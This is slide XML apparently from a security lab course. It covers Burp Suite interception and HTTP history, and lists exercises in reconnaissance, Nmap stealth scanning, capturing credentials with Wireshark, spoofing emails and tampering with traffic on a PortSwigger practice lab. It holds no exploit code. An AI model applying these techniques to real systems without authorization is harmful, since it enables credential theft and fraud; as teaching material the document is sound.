                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Click the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Forward</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> button several times to send the intercepted request, and any subsequent ones, until the page loads in the browser.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="754" name="Google Shape;754;p113"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="873431" y="1492106"/>
            <a:ext cx="7722226" cy="365139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14"/>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145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="720"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 4: Switch off interception</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761" name="Google Shape;761;p114"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1249479"/>
            <a:ext cx="8115300" cy="1261500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Due to the number of requests browsers typically send, you often won't want to intercept every single one of them. Click the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Intercept is on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> button so that it now says </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Intercept is off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="5C5C5B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="5C5C5B"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Go back to the embedded browser and confirm that you can now interact with the site as normal.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="5C5C5B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="762" name="Google Shape;762;p114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2625358"/>
            <a:ext cx="9029701" cy="228892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15"/>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145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="720"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 5: View the HTTP history</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="Google Shape;769;p115"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1318392"/>
            <a:ext cx="8115300" cy="1217100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-260350" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In Burp, go to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Proxy &gt; HTTP history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> tab. Here, you can see the history of all HTTP traffic that has passed through Burp Proxy, even while interception was switched off.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-260350" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Click on any entry in the history to view the raw HTTP request, along with the corresponding response from the server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="770" name="Google Shape;770;p115"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2535413"/>
            <a:ext cx="8753382" cy="2608087"/>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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="273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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</a:t>
            </a:r>
            <a:endParaRPr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b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>9. Demonstrate Web Traffic Poisoning using Burp Suite</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609750" y="1600300"/>
            <a:ext cx="7924500" cy="10266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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Traffic Poisoning using Burp Suite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18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206231" y="573281"/>
            <a:ext cx="8423400" cy="9699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100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="29629"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 1: Access the vulnerable website in the embedded browser</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Google Shape;788;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In Burp, go to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Proxy &gt; Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> tab and make sure interception is switched off.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Launch the embedded browser and use it to access the following URL, logging in if prompted:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When the page loads, click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Access the lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to launch your own instance of a fake shopping website. This may take a few seconds to load.</a:t>
            </a:r>
            <a:endParaRPr sz="18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19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206231" y="573281"/>
            <a:ext cx="8423400" cy="9699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100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="55555"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 1: Access the vulnerable website in the embedded browser</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="795" name="Google Shape;795;p119"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1764094" y="953738"/>
            <a:ext cx="5321631" cy="418976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20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206231" y="573281"/>
            <a:ext cx="8423400" cy="9699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100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="55555"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 1: Access the vulnerable website in the embedded browser</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="802" name="Google Shape;802;p120"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033138" y="849169"/>
            <a:ext cx="5224349" cy="4192162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="803" name="Google Shape;803;p120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944125" y="3966806"/>
            <a:ext cx="2850900" cy="4155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33332"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
